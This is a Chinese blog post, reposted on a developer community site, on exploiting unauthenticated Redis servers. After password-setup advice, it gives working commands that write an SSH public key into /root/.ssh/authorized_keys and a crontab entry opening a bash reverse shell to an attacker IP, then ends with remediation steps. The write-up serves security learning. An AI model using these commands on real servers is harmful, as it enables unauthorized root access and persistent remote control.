开发者社区> 科技小能手> 正文
阿里云
为了无法计算的价值
打开APP
阿里云APP内打开

redis未授权访问漏洞利用

简介:
+关注继续查看

各位大佬好!好久没写过博客记录了,最近挖了个redis未授权访问漏洞,并利用了一番,在此,分享下这个鸡肋却能直接获得服务器权限的漏洞。

0x01:redis基础

Redis默认配置是不需要密码认证的,也就是说只要连接的Redis服务器的host和port正确,就可以连接使用。这在安全性上会有一定的问题,所以需要启用Redis的认证密码,增加Redis服务器的安全性。

  • 修改配置文件

Redis的配置文件默认在/etc/redis.conf,找到如下行:

#requirepass foobared
去掉前面的注释,并修改为所需要的密码:

requirepass myPassword (其中myPassword就是要设置的密码)

  • 重启Redis

如果Redis已经配置为service服务,可以通过以下方式重启:

service redis restart
如果Redis没有配置为service服务,可以通过以下方式重启:

/usr/local/bin/redis-cli shutdown
/usr/local/bin/redis-server /etc/redis.conf

  • 登录验证

设置Redis认证密码后,客户端登录时需要使用-a参数输入认证密码,不添加该参数虽然也可以登录成功,但是没有任何操作权限。如下:

$ ./redis-cli -h 127.0.0.1 -p 6379
127.0.0.1:6379> keys *
(error) NOAUTH Authentication required.
使用密码认证登录,并验证操作权限:

$ ./redis-cli -h 127.0.0.1 -p 6379 -a myPassword
127.0.0.1:6379> config get requirepass
1) "requirepass"
2) "myPassword"
看到类似上面的输出,说明Reids密码认证配置成功。

0x02漏洞描述

漏洞描述:
Redis因配置不当可以未授权访问,被攻击者恶意利用。
攻击者无需认证访问到内部数据,可能导致敏感信息泄露,黑客也可以恶意执行flushall来清空所有数据。
攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件。
如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。

危害:
攻击者可利用该漏洞写入计划任务反弹shell
攻击者可利用该漏洞写入ssh公钥远程连接。

0x03:漏洞利用

  1. 使用redis连接工具连接。windows下学习和连接redis,redis下载地址:https://github.com/dmajkic/redis/downloads
  2. 使用redis-cli.exe连接
    redis未授权访问漏洞利用

0x04:漏洞高级利用

利用原理:
1) SSH免密码登录,Linux下可以设置SSH免密码登录,方法为使用"公私钥"认证,即首先在客户端上创建一对公私钥 (公钥文件:~/.ssh/id_rsa.pub; 私钥文件:~/.ssh/id_rsa)。然后把公钥放到服务器上(~/.ssh/authorized_keys), 自己保留好私钥.在使用ssh登录时,ssh程序会发送私钥去和服务器上的公钥做匹配.如果匹配成功就可以登录了。详细可参考(http://jingyan.baidu.com/article/2fb0ba4043124a00f2ec5f0f.html )SSH免密码登陆远程服务器

2)Redis可通过Redis-CLI远程管理,设置Redis的默认路径以及数据库缓存文件。
方法如下:
config set dir /xxx
config set dbfilename xxxx
set xxxx "xxx"<br/>save

  • 漏洞条件

1.Redis服务使用ROOT账号启动
2.Redis服务无密码认证或者使用的是弱口令进行认证
3.服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器。

首先在本地生成一对密钥:
redis未授权访问漏洞利用

然后通过redis-clis远程连接到目标redis服务器,执行以下命令
redis未授权访问漏洞利用
config set dir /root/.ssh/
config set dbfilename authorized_keys

set xxxx "\n\n\nssh-rsa key_pub\n\n\n",其中key_pub为上图生成的公钥,即可将公钥保存在远端服务器,使得登录时不需要输入账号与密码。Redis已经因该漏洞被入侵,并在其缓存数据库中发现被写入的公钥,建议用户马上对内部网络进行排查。

反弹shell

1、telnet登录/也可以redis-cli登录
redis未授权访问漏洞利用

telnet 192.168.236.130 6379//未授权登录

config set dir /var/spool/cron/ //配置文件夹的路径(CONFIG SET 命令可以动态地调整 Redis 服务器的配置而(configuration)而无须重启。)//每个用户生成的crontab文件,都会放在 /var/spool/cron/ 目录下面

set -.- "\n\n\n* * * * * bash -i &gt;& /dev/tcp/192.168.236.129/9999 0&gt;&1\n\n\n"//直接往当前用户的crontab里写入反弹shell,换行是必不可少的。

2.nc反弹
redis未授权访问漏洞利用
3.Centos里面查看crontab任务。
redis未授权访问漏洞利用

0x06:漏洞修复

该漏洞的修补方法如下:
1)禁止使用 root 权限启动 redis 服务;
2)对 redis 访问启用密码认证,并且添加 IP 访问限制;
3)尽可能不对公网直接开放 SSH 服务。


本文转自 wt7315 51CTO博客,原文链接:http://blog.51cto.com/wt7315/2051136


版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
Redis未授权访问漏洞
利用Redis实现攻击的三种方式
35 0
Redis 未授权访问漏洞(附Python脚本)
0x01 环境搭建 #下载并安装 cd /tmp wget http://download.redis.io/releases/redis-2.8.17.tar.gz tar xzf redis-2.8.17.tar.gz cd redis-2.8.17 make #启动redis服务 cd src ./redis-server 启动redis服务进程后,就可以使用测试客户端程序redis-cli和redis服务交互了。
5095 0
Redis未授权访问漏洞
一、漏洞描述和危害   Redis因配置不当可以未授权访问,被攻击者恶意利用。攻击者无需认证访问到内部数据,可能导致敏感信息泄露,黑客也可以恶意执行flushall来清空所有数据。 攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。
933 0
Springboot整合redis从安装到FLUSHALL
Springboot整合redis从安装到FLUSHALL
1326 0
windows系统上安装Redis,并且设置Redis密码
原文:windows系统上安装Redis,并且设置Redis密码 一、Windows版本的Redis下载 下载地址:https://github.com/MSOpenTech/redis/releases 我下载的是最新版的3.
1031 0
Redis安装和常用知识
在应用Redis过程中经常需要查询些知识,博客园中这个朋友写的不错,转载收藏一下。 Redis 安装与简单示例 http://www.
768 0
php redis 扩展安装
redis 手册 风来了.fox http://www.cnblogs.com/ikodota/archive/2012/03/05/php_redis_cn.html WINDOWS 下扩展安装 下载 http://windows.php.net/downloads/pecl/snaps/redis/2.2.5/ 例如: 我的本地环境是64位的,那么下载
1702 0
文章
问答
文章排行榜
最热
最新
相关电子书
更多
Redis架构与介质选择指引
立即下载
Redis的开发规范和常见问题
立即下载
Redis 的高并发实战:抢购系统
立即下载